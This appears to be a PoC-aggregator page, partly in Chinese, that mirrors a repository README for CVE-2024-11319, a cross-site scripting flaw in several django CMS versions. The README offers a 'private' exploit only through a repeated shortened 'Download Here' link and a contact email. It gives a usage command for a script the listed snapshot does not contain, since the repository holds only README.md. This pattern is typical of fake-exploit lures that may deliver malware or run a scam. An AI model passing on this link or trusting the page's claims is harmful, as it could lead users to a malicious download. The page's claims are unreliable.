关联漏洞
标题:
django CMS 安全漏洞
(CVE-2024-11319)
描述:django CMS是django CMS开源的一个基于 django 框架的开源企业内容管理系统。 django CMS 3.11.7、3.11.8、4.1.2和4.1.3版本存在安全漏洞,该漏洞源于网页生成期间输入中和不当,容易受到跨站脚本攻击。
描述
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
介绍
# CVE-2024-11319: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)
## Overview
An Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability has been identified in django CMS Association's django-cms
## Exploit
**[Download Here](https://bit.ly/3APaYDU)**
## Details
+ **CVE ID:** CVE-2024-11319
+ **Published:** 18/11/2024
+ **Impact:** Critical
+ **Exploit Availability:** Not public, only private.
+ **CVSS:** 9.3
## Vulnerability Description
This vulnerability allows an attacker to execute malicious scripts in a user's browser within the context of the affected django-cms site.
## Affected Versions
This issue affects **django-cms: 3.11.7, 3.11.8, 4.1.2, 4.1.3.**
## Usage
```
python CVE-2024-11319.py
```
## Contact
For inquiries, please contact famixcm@thesecure.biz
## Exploit
**[Download Here](https://bit.ly/3APaYDU)**
文件快照
[4.0K] /data/pocs/b19860576e05511387aec488c221aca8f09fd16c
└── [ 936] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。